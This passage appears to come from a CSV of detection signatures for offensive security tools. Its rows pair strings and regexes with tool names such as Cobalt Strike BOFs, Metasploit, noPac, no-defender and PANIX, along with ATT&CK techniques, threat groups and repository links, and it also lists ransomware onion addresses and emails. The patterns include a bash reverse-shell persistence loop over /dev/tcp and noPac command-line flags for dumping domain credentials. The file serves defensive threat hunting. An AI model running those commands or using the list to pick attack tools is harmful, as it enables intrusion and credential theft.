Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","53486" "*no Mimik@tz - loaded 
successfully*",".{0,1000}no\sMimik\@tz\s\-\sloaded\ssuccessfully.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","53487" "*No pwnable targets. Quitting.*",".{0,1000}No\spwnable\stargets\.\sQuitting\..{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","53488" "*No sandbox-indicative DLLs were discovered loaded in any accessible running process*",".{0,1000}No\ssandbox\-indicative\sDLLs\swere\sdiscovered\sloaded\sin\sany\saccessible\srunning\sprocess.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","53489" "*No unixUserPassword Found*",".{0,1000}No\sunixUserPassword\sFound.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53490" "*no_session_payload.rb*",".{0,1000}no_session_payload\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53491" "*NoApiUser.exe*",".{0,1000}NoApiUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","53493" "*noclient: failed to execute %s: %s*",".{0,1000}noclient\:\sfailed\sto\sexecute\s\%s\:\s\%s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","53494" "*noconsolation /tmp/*",".{0,1000}noconsolation\s\/tmp\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker 
- Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53495" "*noconsolation --local *cmd.exe*",".{0,1000}noconsolation\s\-\-local\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53496" "*noconsolation --local 
*powershell.exe*",".{0,1000}noconsolation\s\-\-local\s.{0,1000}powershell\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53497" "*No-Consolation.cna*",".{0,1000}No\-Consolation\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53498" "*NoConsolation.x64.o*",".{0,1000}NoConsolation\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53499" "*NoConsolation.x86.o*",".{0,1000}NoConsolation\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - 
Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53500" "*No-Consolation-main*",".{0,1000}No\-Consolation\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53501" "*node dnskire.js*",".{0,1000}node\sdnskire\.js.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","53502" "*node 
stealer.js *",".{0,1000}node\sstealer\.js\s.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","53503" "*no-defender/dllmain.cpp*",".{0,1000}no\-defender\/dllmain\.cpp.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","53505" "*no-defender\dllmain.cpp*",".{0,1000}no\-defender\\dllmain\.cpp.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","53506" "*no-defender-loader --*",".{0,1000}no\-defender\-loader\s\-\-.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","53507" "*no-defender-loader.exe --*",".{0,1000}no\-defender\-loader\.exe\s\-\-.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. 
(through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","53508" "*noescapemsqxvizdxyl7f7rmg5cdjwp33pg2wpmiaaibilb4btwzttad.onion*",".{0,1000}noescapemsqxvizdxyl7f7rmg5cdjwp33pg2wpmiaaibilb4btwzttad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53509" "*noescaperjh3gg6oy7rck57fiefyuzmj7kmvojxgvlmwd5pdzizrb7ad.onion*",".{0,1000}noescaperjh3gg6oy7rck57fiefyuzmj7kmvojxgvlmwd5pdzizrb7ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53510" "*NoFault\NoFault.*",".{0,1000}NoFault\\NoFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","53511" "*NoFilter.exe *",".{0,1000}NoFilter\.exe\s.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","53512" "*NoFilter-main.zip*",".{0,1000}NoFilter\-main\.zip.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","53513" "*nohup ./nps &*",".{0,1000}nohup\s\.\/nps\s\&.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","53514" "*nohup bash -c ""while :; do bash -i >& /dev/tcp/*/* 0>&1; sleep 10; done*",".{0,1000}nohup\sbash\s\-c\s\""while\s\:\;\sdo\sbash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\;\ssleep\s10\;\sdone.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","53515" 
"*noname2j6zkgnt7ftxsjju5tfd3s45s4i3egq5bqtl72kgum4ldc6qyd.onion*",".{0,1000}noname2j6zkgnt7ftxsjju5tfd3s45s4i3egq5bqtl72kgum4ldc6qyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53516" "*nonamef5njcxkghbjequlibwe5d3t3li5tmyqdyarnrsryopvku76wqd.onion*",".{0,1000}nonamef5njcxkghbjequlibwe5d3t3li5tmyqdyarnrsryopvku76wqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53517" "*nonamehack2023@gmail.com*",".{0,1000}nonamehack2023\@gmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53518" "*nonamehack2023@tutanota.com*",".{0,1000}nonamehack2023\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53519" "*NoodLinux v1.0.1*",".{0,1000}NoodLinux\sv1\.0\.1.{0,1000}","offensive_tool_keyword","NoodleRAT","AV signature of noodlerat malware","T1059.004 - T1078 - T1105 - T1100 - T1547.006","TA0003 - TA0005 - TA0010 - 
TA0011","N/A","N/A","Malware","https://www.trendmicro.com/en_us/research/24/f/noodle-rat-reviewing-the-new-backdoor-used-by-chinese-speaking-g.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","53520" "*nop_shellcode.bin*",".{0,1000}nop_shellcode\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53521" "*noPac * -dc-ip * --impersonate *",".{0,1000}noPac\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-\-impersonate\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53522" "*noPac.* -create-child*",".{0,1000}noPac\..{0,1000}\s\-create\-child.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53523" "*noPac.* -dc-host *",".{0,1000}noPac\..{0,1000}\s\-dc\-host\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53524" "*noPac.* -dc-ip *",".{0,1000}noPac\..{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53525" "*noPac.* -domain-netbios*",".{0,1000}noPac\..{0,1000}\s\-domain\-netbios.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53526" "*noPac.* 
-dump*",".{0,1000}noPac\..{0,1000}\s\-dump.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53527" "*noPac.* -hashes *",".{0,1000}noPac\..{0,1000}\s\-hashes\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53528" "*noPac.* --impersonate *",".{0,1000}noPac\..{0,1000}\s\-\-impersonate\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53529" "*noPac.* -just-dc-ntlm*",".{0,1000}noPac\..{0,1000}\s\-just\-dc\-ntlm.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53530" "*noPac.* -just-dc-user *",".{0,1000}noPac\..{0,1000}\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - 
T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53531" "*noPac.* -new-name *",".{0,1000}noPac\..{0,1000}\s\-new\-name\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53532" "*noPac.* -no-add *",".{0,1000}noPac\..{0,1000}\s\-no\-add\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53533" "*noPac.* -pwd-last-set*",".{0,1000}noPac\..{0,1000}\s\-pwd\-last\-set.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53534" "*noPac.* -service-name *",".{0,1000}noPac\..{0,1000}\s\-service\-name\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53535" "*noPac.* 
